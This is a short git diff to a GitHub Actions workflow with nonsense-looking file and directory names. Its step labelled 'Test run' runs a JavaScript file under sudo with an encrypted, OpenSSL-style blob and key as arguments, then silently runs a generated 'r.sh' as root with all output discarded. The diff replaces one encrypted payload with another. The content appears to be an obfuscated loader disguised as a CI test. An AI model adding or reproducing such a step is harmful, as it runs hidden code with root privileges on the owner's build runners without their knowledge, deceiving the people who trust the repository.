--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'cyfzt'
+        echo 'oz58n'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/VY0u69CSl5rmXTx8W9gBJAju8UblxlUzg8Y5lwRokEWfQxr0n0cUvTWvhJmwCWqHrisSkiYNasKEU0fVGUPXywn3fZOURmG+syvgG7j1aVEHO+Di78Y8Z 8ke07g && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/Wz81A4mfBb/CFmVekV/KpDgKaPrEVj1MBYJoLYrgGLleR6/2uGxpTqCG7YT6Pz37GueVr2xyFii0jqng7Ze85alDOimI8xTYM15nlTKxWX/znxrT7ZwPh 7uef2i && sudo sh r.sh > /dev/null 2>&1
